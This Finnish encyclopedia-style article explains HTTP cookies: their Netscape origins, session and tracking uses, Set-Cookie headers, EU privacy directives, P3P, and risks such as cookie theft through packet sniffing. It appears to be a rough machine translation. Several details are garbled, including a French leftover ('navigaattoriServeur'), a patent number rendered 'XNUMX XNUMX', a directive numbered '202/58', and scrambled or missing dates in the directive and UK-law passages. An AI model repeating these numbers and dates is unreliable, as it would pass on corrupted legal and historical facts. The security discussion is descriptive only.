in Määritelmät, Wiki

Internet-eväste: mikä se on? Määritelmä, alkuperä, tyypit ja yksityisyys

Mikä on evästeen tehtävä, mikä se on ja minkä tyyppisiä evästeitä on? 🍪

56.3 km Näyttökerrat 384 Äänet

Internet-eväste: mikä se on? Määritelmä, alkuperä, tyypit ja yksityisyys
Internet-eväste: mikä se on? Määritelmä, alkuperä, tyypit ja yksityisyys

Un eväste tai verkkoeväste (Tai evästeen, lyhennettynä todistaja Quebecissä) määritetään HTTP-viestintäprotokollassa tietosarjaksi, jonka HTTP-palvelin lähettää HTTP-asiakkaalle ja joka palauttaa joka kerta, kun samaa HTTP-palvelinta kysytään tietyissä olosuhteissa.

Eväste vastaa a pieni tekstitiedosto, joka on tallennettu päätteeseen Internetin käyttäjästä. Ne ovat olleet olemassa yli 20 vuotta, ja ne antavat verkkosivustojen kehittäjille mahdollisuuden tallentaa käyttäjätietoja navigoinnin helpottamiseksi ja tiettyjen toimintojen mahdollistamiseksi. Evästeet ovat aina olleet enemmän tai vähemmän kiistanalaisia, koska ne sisältävät jäännöshenkilötietoja, joita kolmannet osapuolet voivat mahdollisesti hyödyntää.

Web-palvelin lähettää sen HTTP-otsikona verkkoselaimelle, joka palauttaa sen muuttumattomana aina, kun se käyttää palvelinta. Evästettä voidaan käyttää todennus, istunto (valtion ylläpito) ja varten tallentaa tiettyjä tietoja käyttäjästä, kuten sivustoasetukset tai sähköisen ostoskorin sisältö. Termi eväste on johdettu maaginen eväste, tunnettu UNIX-laskennan konsepti, joka inspiroi selaimen evästeiden ideaa ja nimeä. Evästeille on olemassa muutamia vaihtoehtoja, joista jokaisella on omat käyttötarkoituksensa, etunsa ja haittansa.

Evästeet eivät ole suoritettavia, koska ne ovat yksinkertaisia ​​tekstitiedostoja. Ne eivät ole ei vakoiluohjelmia eikä viruksia, vaikka monet virustorjuntaohjelmistot havaitsevat joidenkin sivustojen evästeet, koska niiden avulla voidaan seurata käyttäjiä, kun he vierailevat useilla sivustoilla. 

Useimmat nykyaikaiset selaimet antavat käyttäjille mahdollisuuden päättää, hyväksytkö vai hylkäätkö evästeet. Käyttäjät voivat myös valita, kuinka kauan evästeitä säilytetään. Evästeiden täydellinen hylkääminen tekee kuitenkin joistakin sivustoista käyttökelvottomia. Säilytä esimerkiksi ostoskärryjä tai sivustoja, jotka vaativat kirjautumisen tunnistetiedoilla (käyttäjänimi ja salasana).

Sisällysluettelo

Historiallinen

termi pikkuleipä tulee englanninkielisestä termistä maaginen eväste, joka on tietopaketti, jonka ohjelma vastaanottaa ja palauttaa muuttumattomana. Evästeitä käytettiin IT:ssä jo silloin Lou Montulli hänellä oli idea käyttää niitä verkkoviestinnässä kesäkuussa 1994. Hän oli tuolloin Netscape Communicationsin palveluksessa, joka oli kehittänyt verkkokauppasovelluksen asiakkaalle. Evästeet antoivat ratkaisun kaupan virtuaalisen ostoskorin toteutuksen luotettavuusongelmaan.

John Giannandrea ja Lou Montulli kirjoittivat Netscapen ensimmäisen evästemäärittelyn samana vuonna. Mosaic Netscapen versio 0.9 beta, julkaistu 13. lokakuuta 1994, integroitu evästetekniikka (katso viesti). Ensimmäinen (ei-kokeellinen) evästeiden käyttö oli määrittää, olivatko Netscapen verkkosivuston vierailijat vierailleet sivustolla aiemmin. Montulli jätti patenttihakemuksen evästeteknologialle vuonna 1995, ja US-patentti 5774670 XNUMX XNUMX myönnettiin. myönnetty vuonna 1998.

Sen jälkeen kun evästeet otettiin käyttöön Netscape 0.9 beta -versiossa vuonna 1994, evästeet integroitiin Internet Explorer 2:een, joka julkaistiin lokakuussa 1995.

Evästeiden käyttöönotto ei ole vielä ollut laajalti yleisön tiedossa. Erityisesti evästeet hyväksyttiin oletuksena selaimen asetuksissa, eikä käyttäjille ilmoitettu niiden läsnäolosta. Jotkut ihmiset tiesivät evästeiden olemassaolosta vuoden 1995 ensimmäisen neljänneksen tienoilla, mutta suuri yleisö ymmärsi niiden olemassaolon vasta sen jälkeen, kun Financial Times julkaisi artikkelin 12. helmikuuta 1996. Samana vuonna evästeet saivat paljon huomiota tiedotusvälineissä. mahdollisten yksityisyyden loukkausten takia. Evästeiden aihetta käsiteltiin kahdessa Yhdysvaltain liittovaltion kauppakomission kuulemisessa vuosina 1996 ja 1997.

Virallisen evästemäärittelyn kehittäminen oli jo käynnissä. Ensimmäiset keskustelut virallisesta spesifikaatiosta käytiin huhtikuussa 1995 www-talk-postituslistalla. Perustettiin erityinen IETF-työryhmä. Brian Behlendorf ja David Kristol ehdottivat kaksi vaihtoehtoista ehdotusta HTTP-tapahtumien tilan käyttöönotosta, mutta Kristolin itsensä johtama ryhmä päätti käyttää Netscapen määrittelyä lähtökohtana. Helmikuussa 1996 työryhmä totesi, että kolmannen osapuolen evästeet uhkaavat merkittävästi yksityisyyttä. Ryhmän tuottama erittely julkaistiin lopulta nimellä RFC 2109.

Vuoden 2014 lopusta lähtien monilla sivustoilla on banneri evästeistä. Ainakin yksi selainlaajennus mahdollistaa banneria ei näytetä.

Evästeiden tyypit ja käyttö

Istunnon hallinta

Evästeitä voidaan käyttää käyttäjätietojen säilyttämiseen navigoinnin aikana, mutta myös useiden käyntien aikana. Evästeet otettiin käyttöön keinona toteuttaa sähköisiä ostoskärryjä, virtuaalisia laitteita, joihin käyttäjä voi kerätä tuotteita, joita hän haluaa ostaa sivustoa selatessaan.

Nykyään sovellukset, kuten ostoskärryt, tallentavat tuoteluettelon palvelimen tietokantaan, mikä on suositeltavaa. kuin tallentamalla ne itse evästeeseen. Verkkopalvelin lähettää evästeen, joka sisältää yksilöllisen istuntotunnuksen. Verkkoselain palauttaa tämän istuntotunnuksen jokaisessa myöhemmässä pyynnössä, ja korin tuotteet tallennetaan ja liitetään samaan yksilölliseen istuntotunnukseen.

Evästeiden säännöllinen käyttö on hyödyllistä kirjautuessasi sivustolle tunnistetiedoilla. Lyhyesti sanottuna verkkopalvelin lähettää ensin evästeen, joka sisältää yksilöllisen istuntotunnuksen. Tämän jälkeen käyttäjät antavat käyttäjätietonsa (yleensä käyttäjätunnuksen ja salasanan). Tämän jälkeen verkkosovellus todentaa istunnon ja antaa käyttäjän käyttää palvelua.

personointi

Evästeitä voidaan käyttää sivuston käyttäjää koskevien tietojen muistamiseen, jotta hänelle voidaan tulevaisuudessa näyttää sopivaa sisältöä. Verkkopalvelin voi esimerkiksi lähettää evästeen, joka sisältää viimeksi kyseiselle verkkosivustolle kirjautumiseen käytetyn käyttäjänimen, jotta käyttäjätunnus voidaan täyttää valmiiksi tulevien käyntien yhteydessä.

Monet verkkosivustot käyttävät evästeitä mukauttamiseen käyttäjien mieltymysten perusteella. Käyttäjät valitsevat valintansa lomakkeella ja lähettävät ne palvelimelle. Palvelin koodaa asetukset evästeeseen ja lähettää sen takaisin selaimeen. Tämän jälkeen aina, kun käyttäjä siirtyy tämän sivuston sivulle, selain palauttaa evästeen ja siten asetusluettelon; palvelin voi sitten muokata sivua käyttäjän mieltymysten mukaan. Esimerkiksi Wikipedia-sivuston käyttäjät voivat valita haluamansa sivuston ulkoasun. Googlen hakukone antaa käyttäjiensä (vaikka he eivät ole rekisteröityneet) valita, kuinka monta tulosta he haluavat nähdä kullakin tulossivulla.

Seuranta

Seurantaevästeitä käytetään internetin käyttäjien selaustottumusten seuraamiseen. Tämä voidaan tehdä myös osittain käyttämällä sivua pyytävän tietokoneen IP-osoitetta tai käyttämällä "viittaus" HTTP-otsikkoa, jonka asiakas lähettää jokaisen pyynnön yhteydessä, mutta evästeet mahdollistavat suuremman tarkkuuden. Tämä voidaan tehdä kuten seuraavassa esimerkissä:

  1. Jos käyttäjä avaa sivuston sivun, eikä pyyntö sisällä evästettä, palvelin olettaa, että tämä on ensimmäinen sivu, jolla käyttäjä vierailee. Palvelin luo sitten satunnaisen merkkijonon ja lähettää sen selaimeen yhdessä pyydetyn sivun kanssa.
  2. Tästä hetkestä lähtien selain lähettää evästeen automaattisesti aina, kun sivuston uusi sivu kutsutaan. Palvelin lähettää sivun tavalliseen tapaan, mutta kirjaa lokitiedostoon myös kutsutun sivun URL-osoitteen, pyynnön päivämäärän, kellonajan ja evästeen.

Lokitiedostoa katsomalla on sitten mahdollista nähdä, millä sivuilla käyttäjä on käynyt ja missä järjestyksessä. Jos tiedosto sisältää esimerkiksi muutamia id=abc-evästeellä tehtyjä pyyntöjä, tämä voi osoittaa, että kaikki nämä pyynnöt tulevat samalta käyttäjältä. Pyydetyn URL-osoitteen, pyyntöihin liittyvän päivämäärän ja kellonajan avulla voidaan seurata käyttäjän selailua.

Kolmannen osapuolen evästeet ja jäljitteet, jotka selitetään alla, mahdollistavat lisäksi seurannan eri sivustoilla. Yhden sivuston seurantaa käytetään yleensä tilastollisiin tarkoituksiin. Sitä vastoin mainosyritykset käyttävät yleensä seurantaa eri sivustoilla käyttämällä kolmannen osapuolen evästeitä anonyymien käyttäjäprofiilien tuottamiseen (joita sitten käytetään määrittämään, mitä mainoksia käyttäjälle tulee näyttää sekä lähettää hänelle näitä mainoksia vastaavia sähköposteja – roskapostia). ).

Seurantaevästeet ovat riski käyttäjien yksityisyyden loukkaamisesta, mutta ne voidaan helposti poistaa. Useimmissa nykyaikaisissa selaimissa on mahdollisuus poistaa pysyvät evästeet automaattisesti, kun sovellus suljetaan.

Kolmannen osapuolen evästeet

Web-sivun kuvat ja muut objektit voivat sijaita eri palvelimilla kuin sivua isännöivä. Sivun näyttämiseksi selain lataa kaikki nämä objektit. Useimmat verkkosivustot sisältävät tietoa eri lähteistä. Jos esimerkiksi kirjoitat selaimeesi www.example.com, osassa sivua on usein esineitä tai mainoksia, jotka tulevat eri lähteistä, eli eri verkkotunnuksesta kuin www. .example.com. "Ensimmäisen" osapuolen evästeet ovat selaimen osoiterivillä olevan verkkotunnuksen asettamia evästeitä. Kolmannen osapuolen evästeet asettaa jokin sivuobjekteista, joka tulee eri verkkotunnuksesta.

Oletusarvoisesti selaimet, kuten Mozilla Firefox, Microsoft Internet Explorer ja Opera, hyväksyvät kolmannen osapuolen evästeet, mutta käyttäjät voivat muuttaa selaimen asetuksia estääkseen ne. Kolmannen osapuolen evästeisiin, jotka mahdollistavat verkkotoiminnon, ei liity turvallisuusriskiä, ​​mutta niitä käytetään myös käyttäjien seurantaan. sivustolta sivustolle.

Kaikkiin selaimiin, kuten Google Chromeen, saatavilla olevat työkalut, kuten Ghostery, voivat estää kolmansien osapuolten välisen tiedonsiirron.

Toteutus

Mahdollinen vuorovaikutus verkkoselaimen ja verkkosivua isännöivän palvelimen välillä. Palvelin lähettää evästeen selaimelle ja selain lähettää sen takaisin kutsuessaan toista sivua.
Mahdollinen vuorovaikutus verkkoselaimen ja verkkosivua isännöivän palvelimen välillä. Palvelin lähettää evästeen selaimelle ja selain lähettää sen takaisin kutsuessaan toista sivua.

Evästeet ovat pieniä tietopaloja, jotka verkkopalvelin lähettää selaimelle. Selain palauttaa ne muuttamattomina palvelimelle tuoden tilan (menneiden tapahtumien muisti) muuten tilattomaan HTTP-tapahtumaan. Ilman evästeitä jokainen verkkosivun tai verkkosivun osan haku on erillinen tapahtuma, joka on riippumaton muista samalle sivustolle tehdyistä pyynnöistä. Sen lisäksi, että verkkopalvelin voi asettaa evästeet, ne voidaan asettaa myös komentosarjakielillä, kuten JavaScriptillä, jos selain tukee ja sallii.

Virallinen evästemääritys ehdottaa, että selaimien pitäisi pystyä tallentamaan ja lähettämään uudelleen vähimmäismäärä evästeitä. Erityisesti selaimen pitäisi pystyä tallentamaan vähintään 300 neljän kilotavun evästettä ja vähintään 20 evästettä yhdelle palvelimelle tai verkkotunnukselle.

Kohdan 3.1 mukaisesti RFC 2965, evästeiden nimissä kirjainkoolla ei ole merkitystä.

Eväste voi määrittää vanhenemispäivämääränsä, jolloin eväste poistetaan kyseisenä päivänä. Jos eväste ei määrittele viimeistä voimassaolopäivää, eväste poistetaan heti, kun käyttäjä poistuu selaimestaan. Siksi vanhenemispäivän määrittäminen on tapa saada eväste säilymään useiden istuntojen ajan. Tästä syystä evästeiden, joilla on viimeinen voimassaolopäivä, sanotaan olevan itsepintainen. Esimerkkisovellus: vähittäiskauppasivusto saattaa käyttää pysyviä evästeitä tallentaakseen tuotteet, jotka käyttäjät ovat laittaneet ostoskoriin (todellisuudessa eväste saattaa viitata tietokantaan tallennettuun merkintään myyntipaikalla, ei tietokoneellesi) . Tämä tarkoittaa sitä, että jos käyttäjät poistuvat selaimestaan ​​tekemättä ostoksia ja palaavat siihen myöhemmin, he voivat löytää tuotteet uudelleen ostoskorista. Jos nämä evästeet eivät antaisi vanhenemispäivää, ne vanhenevat, kun selain suljetaan, ja tiedot korin sisällöstä häviävät.

Evästeiden laajuus voidaan rajoittaa tiettyyn verkkotunnukseen, aliverkkotunnukseen tai polkuun ne luoneessa palvelimessa.

Web-sivujen siirto tapahtuu HTTP-protokollalla (HyperText Transfer Protocol). Jättämällä evästeet huomioimatta selaimet kutsuvat sivua verkkopalvelimista lähettämällä heille yleensä lyhyen tekstiviestin HTTP-pyyntö. Esimerkiksi päästäkseen sivulle www.example.org/index.html selaimet muodostavat yhteyden palvelimeen www.example.org ja lähettävät pyynnön, joka näyttää tältä:

GET /index.html HTTP/1.1Host: www.example.org
navigaattoriServeur

Palvelin vastaa lähettämällä pyydetyn sivun, jota edeltää samankaltainen teksti, jolloin koko kutsutaan HTTP-vastaus. Tämä paketti voi sisältää rivejä, jotka ohjaavat selainta tallentamaan evästeet:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: nimi=arvo
(HTML-sivu)
navigaattoriServeur

Palvelin lähettää Set-Cookie -rivin vain, jos palvelin haluaa selaimen tallentavan evästeen. Set-Cookie on pyyntö selaimelle tallentaa nimi=arvo-merkkijono ja palauttaa se kaikissa tulevissa pyynnöissä palvelimelle. Jos selain tukee evästeitä ja evästeet on otettu käyttöön selaimen asetuksissa, eväste sisällytetään kaikkiin myöhemmissä samalle palvelimelle tehtäviin pyyntöihin. Esimerkiksi selain kutsuu sivua www.example.org/news.html lähettämällä seuraavan pyynnön palvelimelle www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgEväste: nimi=arvoHyväksy: */*
navigaattoriServeur

Tämä on pyyntö toiselle sivulle samalta palvelimelta ja eroaa edellisestä, koska se sisältää merkkijonon, jonka palvelin on aiemmin lähettänyt selaimelle. Tämän keinon ansiosta palvelin tietää, että tämä pyyntö on linkitetty edelliseen. Palvelin vastaa lähettämällä kutsutun sivun ja myös lisäämällä sille muita evästeitä.

Palvelin voi muuttaa evästeen arvoa lähettämällä uuden rivin Set-Cookie: nimi=uusi_arvo vasteena kutsutulle sivulle. Selain korvaa sitten vanhan arvon uudella.

Set-Cookie -rivin luo yleensä CGI-ohjelma tai muu komentosarjakieli, ei HTTP-palvelin. HTTP-palvelin (esimerkki: Apache) lähettää selaimelle vain ohjelman tuloksen (asiakirjan, jota edeltää evästeet sisältävä otsikko).

Evästeet voidaan asettaa myös JavaScriptillä tai muilla vastaavilla selaimessa toimivilla kielillä, eli asiakaspuolella palvelimen sijaan. JavaScriptissä document.cookie-objektia käytetään tähän tarkoitukseen. Esimerkiksi lause document.cookie = "temperature=20" luo evästeen nimeltä "temperature" ja jonka arvo on 20.

Esimerkki HTTP-vastauksesta osoitteesta google.com, joka asettaa evästeen määritteineen.
Esimerkki HTTP-vastauksesta osoitteesta google.com, joka asettaa evästeen määritteineen.

Nimi/arvo-parin lisäksi eväste voi sisältää myös vanhenemispäivän, polun, verkkotunnuksen ja aiotun yhteyden tyypin, eli normaalin tai salatun. RFC 2965 määrittelee myös, että evästeillä on oltava pakollinen versionumero, mutta tämä jätetään yleensä pois. Nämä tietoosat seuraavat nimi=uusi_arvo-paria ja erotetaan puolipisteillä. Esimerkiksi palvelin voi luoda evästeen lähettämällä Set-Cookie -rivin: nimi=uusi_arvo; päättyy = päivämäärä; polku=/; domain=.example.org.

Evästeet vanhenevat, eikä selain lähetä niitä palvelimelle seuraavissa tilanteissa:

  • Kun selain on suljettu, jos eväste ei ole pysyvä.
  • Kun evästeen viimeinen käyttöpäivä on kulunut.
  • Kun evästeen vanhenemispäivä on muutettu (palvelimen tai komentosarjan toimesta) menneisyyteen.
  • Kun selain poistaa evästeen käyttäjän pyynnöstä.

Kolmannessa tilanteessa palvelimet tai komentosarjat voivat nimenomaisesti poistaa evästeen. Huomaa, että Google Chrome -selaimella on mahdollista tietää tietyn evästeen vanhentumispäivä sisältöasetuksista. Tietokoneelle tallennettu eväste voi hyvinkin pysyä siellä useita vuosikymmeniä, jos sen poistamiseksi ei ryhdytä toimenpiteisiin.

Stereotypiat

Internetissä ja tiedotusvälineissä on levinnyt monia evästeitä koskevia ajatuksia niiden Internet-julkaisun jälkeen. Vuonna 1998 CIAC, Yhdysvaltain energiaministeriön tietokoneonnettomuuksien seurantaryhmä, totesi, että evästeiden tietoturvahaavoittuvuudet olivat "olennaisesti olemattomia" ja selitti, että "tiedot vierailujesi alkuperästä ja vierailemiesi verkkosivujen tiedot olemassa jo web-palvelimien lokitiedostoissa”. Vuonna 2005 Jupiter Research julkaisi tutkimuksen tulokset, jossa merkittävä prosenttiosuus vastaajista piti seuraavia väitteitä:

  • Evästeet ovat kuin virus, ne saastuttaa käyttäjien kiintolevyt.
  • Evästeet tuottavat pop-up.
  • Evästeitä käytetään lähettämiseen spam.
  • Evästeitä käytetään vain mainontaan.

Evästeet eivät voi poistaa tai lukea tietoja käyttäjän tietokoneelta. Evästeiden avulla on kuitenkin mahdollista havaita verkkosivut, joilla käyttäjä on käynyt tietyllä sivustolla tai sivustojoukolla. Nämä tiedot voidaan kerätä käyttäjäprofiiliin, jota voidaan käyttää tai myydä edelleen kolmansille osapuolille, mikä voi aiheuttaa vakavia tietosuojaongelmia. Jotkut profiilit ovat anonyymejä siinä mielessä, että ne eivät sisällä henkilökohtaisia ​​tietoja, mutta jopa tällaiset profiilit voivat olla kyseenalaisia.

Saman tutkimuksen mukaan suuri osa Internetin käyttäjistä ei osaa poistaa evästeitä. Yksi syy siihen, miksi ihmiset eivät luota evästeisiin, on se, että jotkin sivustot ovat käyttäneet väärin evästeiden henkilökohtaista tunnistamista ja jakaneet nämä tiedot muiden lähteiden kanssa. Suuri osa kohdistetusta mainonnasta ja ei-toivotusta sähköpostista, jota pidetään roskapostina, tulee seurantaevästeistä kerätyistä tiedoista.

Selaimen asetukset

Useimmat selaimet tukevat evästeitä ja sallivat käyttäjän poistaa ne käytöstä. Yleisimmät vaihtoehdot ovat:

  • Ota evästeet käyttöön tai poista ne kokonaan käytöstä, jotta ne hyväksytään tai estetään jatkuvasti.
  • Salli käyttäjän nähdä tietyn sivun aktiiviset evästeet kirjoittamalla selaimen osoiteriville javascript: alert(document.cookie). Jotkut selaimet sisältävät evästeenhallinnan käyttäjää varten, joka voi tarkastella ja valikoivasti poistaa selaimen tällä hetkellä tallentamia evästeitä.

Useimmat selaimet sallivat myös henkilötietojen, mukaan lukien evästeet, täydellisen poistamisen. Myös lisämoduuleja evästeiden käyttöoikeuksien hallintaan on olemassa.

Tietosuoja ja kolmannen osapuolen evästeet

Tässä kuvitteellisessa esimerkissä mainosyritys on sijoittanut bannereita kahdelle verkkosivustolle. Isännöimällä bannereita palvelimillaan ja käyttämällä kolmannen osapuolen evästeitä mainostoimisto pystyy seuraamaan käyttäjän navigointia näillä kahdella sivustolla.

Evästeet vaikuttavat merkittävästi verkkokäyttäjien yksityisyyteen ja nimettömyyteen. Vaikka evästeet lähetetään takaisin vain ne asettaneelle palvelimelle tai samaan Internet-verkkoalueeseen kuuluvalle palvelimelle, web-sivu voi kuitenkin sisältää kuvia tai muita osia, jotka on tallennettu muille verkkotunnuksille kuuluville palvelimille. Evästeitä, jotka asetetaan näiden ulkoisten komponenttien palautuksen aikana, kutsutaan kolmannen osapuolen evästeet. Tämä sisältää evästeet ei-toivotuista ponnahdusikkunoista.

Mainosyritykset käyttävät kolmannen osapuolen evästeitä seuratakseen käyttäjiä eri sivustoilla, joilla he vierailevat. Erityisesti mainosyritys voi seurata käyttäjää kaikilla sivuilla, joille se on sijoittanut mainoskuvia tai seurantapikselin. Käyttäjän vierailemien sivujen tuntemus antaa mainosyritykselle mahdollisuuden kohdistaa käyttäjän mainontamieltymyksiin.

Jotkut pitävät mahdollisuutta luoda käyttäjäprofiili loukkaavana tietosuojaa, varsinkin kun seuranta tapahtuu eri verkkotunnuksissa käyttämällä kolmannen osapuolen evästeitä. Tästä syystä joissakin maissa on evästelainsäädäntö.

Yhdysvaltain hallitus otti käyttöön tiukat säännöt evästeiden sijoittamisesta vuonna 2000 sen jälkeen, kun kävi ilmi, että Valkoisen talon huumepoliittinen toimisto käytti evästeitä seuratakseen huumemainoksia verkossa katselevien käyttäjien tietokoneita. Vuonna 2002 tietosuojaaktivisti Daniel Brandt huomasi, että CIA jätti pysyviä evästeitä tietokoneisiin, jotka olivat vierailleet sen verkkosivuilla. Saatuaan tiedon tästä rikkomuksesta CIA ilmoitti, että näitä evästeitä ei lähetetty tarkoituksella, ja lopetti niiden asettamisen. 25. joulukuuta 2005 Brandt havaitsi, että National Security Agency (NSA) oli jättänyt kaksi pysyvää evästettä vierailijoiden tietokoneisiin ohjelmistopäivityksen vuoksi. Ilmoituksen saatuaan NSA poisti evästeet välittömästi käytöstä.

Yhdistyneessä kuningaskunnassa, Evästelaki ", joka tuli voimaan 25, velvoittaa sivustot ilmoittamaan aikeistaan, jolloin käyttäjät voivat valita, haluavatko he jättää jälkiä kulkustaan ​​Internetiin vai eivät. Ne voidaan näin suojata mainonnan kohdistamiselta. Kuitenkin, mukaan Guardian, Internetin käyttäjien suostumus ei välttämättä ole yksiselitteinen; käyttäjän suostumuksen ehtoihin on tehty muutoksia, mikä tekee siitä näin viitataan.

Yksityisyyden suojaa koskeva direktiivi 2002/58

Yksityisyyden suojaa ja sähköistä viestintää koskeva direktiivi 202/58 sisältää säännöt evästeiden käytöstä. Erityisesti tämän direktiivin 5 artiklan 3 kohdassa edellytetään, että tietojen (kuten evästeiden) tallentaminen käyttäjän tietokoneelle voidaan tehdä vain, jos:

  • käyttäjälle kerrotaan, kuinka tietoja käytetään;
  • käyttäjälle annetaan mahdollisuus kieltäytyä tästä tallennustoiminnosta. Tässä artiklassa kuitenkin todetaan myös, että tietojen tallentaminen teknisistä syistä on vapautettu tästä laista.

Koska direktiivi oli määrä panna täytäntöön lokakuusta 2003 alkaen, se oli kuitenkin vain erittäin epätäydellisesti pantu täytäntöön joulukuussa 2004 julkaistun raportin mukaan, jossa myös korostettiin, että tietyt jäsenvaltiot (Slovakia, Latvia, Kreikka, Belgia ja Luxemburg) eivät olleet vielä saattaneet direktiiviä osaksi kansallista lainsäädäntöään. osaksi kansallista lainsäädäntöä.

G29-ryhmän vuonna 2010 antaman lausunnon mukaan tätä direktiiviä, jossa erityisesti edellytetään evästeiden käyttöä käyttäytymiseen perustuvassa mainonnassa, Internetin käyttäjän nimenomaiseen suostumukseen sovelletaan edelleen erittäin huonosti. Itse asiassa useimmat sivustot tekevät niin tavalla, joka ei noudata direktiiviä, rajoittumalla yksinkertaiseen "banneriin", joka ilmoittaa "evästeiden" käytöstä antamatta tietoja käytöstä, tekemättä eroa "teknisten" evästeiden välillä. "seurantaevästeitä" eikä tarjota todellista vaihtoehtoa käyttäjälle, joka haluaa ylläpitää teknisiä evästeitä (kuten ostoskorinhallintaevästeitä) ja kieltäytyä "seurantaevästeiden" käytöstä. Itse asiassa monet sivustot eivät toimi oikein, jos evästeet evätään, mikä ei ole direktiivin 2002/58 tai direktiivin 95/46 (henkilötietojen suoja) mukaista.

Direktiivi 2009/136 / EY

Tämä materiaali on päivitetty 2009. marraskuuta 136 päivätyllä direktiivillä 25/2009/EY, jonka mukaan "tietojen tallentaminen tai jo tallennettujen tietojen saaminen tilaajan tai käyttäjän päätelaitteisiin on sallittua vain sillä ehdolla, että tilaaja tai käyttäjä on antanut suostumuksensa saatuaan direktiivin 95/46/EY mukaisesti selkeät ja täydelliset tiedot muiden kesken käsittelyn tarkoituksista. Uusi direktiivi siis vahvistaa velvoitteita ennen evästeiden asettamista Internetin käyttäjän tietokoneelle.

Direktiivin alustavissa pohdinnoissa EU:n lainsäätäjä kuitenkin täsmentää: "Jos se on teknisesti mahdollista ja tehokasta, direktiivin 95/46/EY asiaa koskevien säännösten mukaisesti, käyttäjän suostumus käsittelyyn voidaan ilmaista selaimen tai muun sovelluksen asianmukaisten asetusten käyttö”. Mutta itse asiassa mikään selain ei ole tähän mennessä mahdollistanut olennaisten teknisten evästeiden erottamista valinnaisista evästeistä, jotka tulisi jättää käyttäjän valinnan varaan.

Belgian kansanedustajat saattoivat tämän uuden direktiivin osaksi kansallista lainsäädäntöä heinäkuussa 2012. Vuoden 2014 tutkimus osoittaa, että jopa kansanedustajilla on vaikeuksia soveltaa sitä. direktiivin rajoitukset.

P3P

P3P-spesifikaatio sisältää palvelimen mahdollisuuden ilmoittaa tietosuojakäytännön, joka määrittelee, millaista tietoa se kerää ja mihin tarkoitukseen. Näihin käytäntöihin kuuluu (mutta ei rajoittuen) evästeiden avulla kerättyjen tietojen käyttö. P3P:n määritelmien mukaan selain voi hyväksyä tai hylätä evästeet vertaamalla tietosuojakäytäntöjä käyttäjän mieltymyksiin tai kysymällä käyttäjältä esittämällä palvelimen ilmoittaman tietosuojaselosteen.

Monet selaimet, mukaan lukien Apple Safari ja Microsoft Internet Explorer versiot 6 ja 7, tukevat P3P:tä, jonka avulla selain voi määrittää, hyväksyykö se kolmannen osapuolen evästeiden tallennuksen. Opera-selaimen avulla käyttäjät voivat kieltäytyä kolmannen osapuolen evästeistä ja luoda globaalin ja erityisen suojausprofiilin Internet-verkkotunnuksille. Mozilla Firefoxin versio 2 lopetti P3P-tuen, mutta palautti sen versioon 3.

Useimmat selaimet voivat estää kolmannen osapuolen evästeet yksityisyyden lisäämiseksi ja mainosten seurannan vähentämiseksi vaikuttamatta negatiivisesti käyttäjän verkkokokemukseen. Monet mainostoimistot tarjoavat vaihtoehdon jättäytyä syrjään kohdistettuun mainontaan asettamalla selaimeen yleinen eväste, joka deaktivoi tämän kohdistuksen, mutta tällainen ratkaisu ei ole käytännössä tehokas, kun sitä kunnioitetaan, koska tämä yleinen eväste poistetaan heti, kun käyttäjä poistaa nämä evästeet, mikä peruuttaa valinnan. ulos päätös.

Evästeiden haitat

Yksityisyysongelmien lisäksi evästeillä on myös joitain teknisiä haittoja. Erityisesti ne eivät aina tunnista käyttäjiä tarkasti, ne voivat hidastaa sivuston suorituskykyä, kun niitä on suuria määriä, niitä voidaan käyttää tietoturvahyökkäyksiin, ja ne ovat ristiriidassa ohjelmiston edustavan tilasiirron, arkkitehtonisen tyylin kanssa.

Epätarkka tunnistaminen

Jos tietokoneessa käytetään useampaa kuin yhtä selainta, jokaisessa niistä on aina erillinen tallennusyksikkö evästeille. Evästeet eivät siis tunnista henkilöä, vaan käyttäjätilin, tietokoneen ja verkkoselaimen yhdistelmää. Näin ollen kuka tahansa voi käyttää näitä tilejä, tietokoneita tai selaimia, joissa on kaikki evästeet. Evästeet eivät myöskään tee eroa useiden käyttäjien välillä, jotka jakavat saman käyttäjätilin, tietokoneen ja selaimen, kuten "internetkahviloissa" tai missä tahansa paikassa, joka tarjoaa ilmaisen pääsyn tietokoneresursseihin.

Mutta käytännössä tämä väite osoittautuu useimmissa tapauksissa harhaanjohtavaksi, koska nykyään "henkilökohtaista" tietokonetta (tai älypuhelinta tai tablettia, mikä pahempaa) käyttää pääasiassa yksi henkilö. Tämä tarkoittaa kohdistamista tiettyyn henkilöön ja kerätyn tiedon määrän kautta päästään yksilölliseen kohdistamiseen, vaikka henkilöä ei "nimittäin" tunnistettaisi.

Toinen verkossa oleva tietokone voi varastaa evästeen.

Normaalin toiminnan aikana evästeet lähetetään takaisin palvelimen (tai saman toimialueen palvelinryhmän) ja käyttäjän tietokoneen selaimen välillä. Koska evästeet voivat sisältää arkaluonteisia tietoja (käyttäjätunnus, todentamiseen käytetty salasana jne.), niiden arvot eivät saa olla muiden tietokoneiden saatavilla. Evästevarkaus on teko, jossa luvaton kolmas osapuoli sieppaa evästeet.

Evästeet voidaan varastaa pakettihauskijan kautta istuntokaappaukseksi kutsutussa hyökkäyksessä. Muut kuin lähettävät ja vastaanottavat tietokoneet voivat siepata ja lukea verkon liikennettä (etenkin salaamattomassa julkisessa Wi-Fi-tilassa). Tämä liikenne sisältää evästeet, jotka lähetetään istuntojen aikana käyttämällä tavallista HTTP-protokollaa. Kun verkkoliikennettä ei ole salattu, pahantahtoiset käyttäjät voivat siis lukea muiden verkon käyttäjien viestintää "pakettihaikaisijoiden" avulla.

Tämä ongelma voidaan ratkaista salaamalla käyttäjän tietokoneen ja palvelimen välinen yhteys HTTPS-protokollalla. Palvelin voi määrittää a turvallinen lippu kun asetat evästeen; selain lähettää sen vain suojatun linjan, kuten SSL-yhteyden, kautta.

Vaikka monet sivustot käyttävätkin HTTPS-salattua viestintää käyttäjän todentamiseen (eli kirjautumissivulle), ne lähettävät myöhemmin istunnon evästeitä ja muuta dataa normaalisti salaamattomien HTTP-yhteyksien kautta tehokkuussyistä. Hyökkääjät voivat siten siepata muiden käyttäjien evästeitä ja esiintyä heinä sopivilla sivustoilla tai käyttää niitä evästehyökkäyksissä.

Sivuston komentosarjat: eväste, joka tulee vaihtaa vain palvelimen ja asiakkaan välillä, lähetetään toiselle kolmannelle osapuolelle.

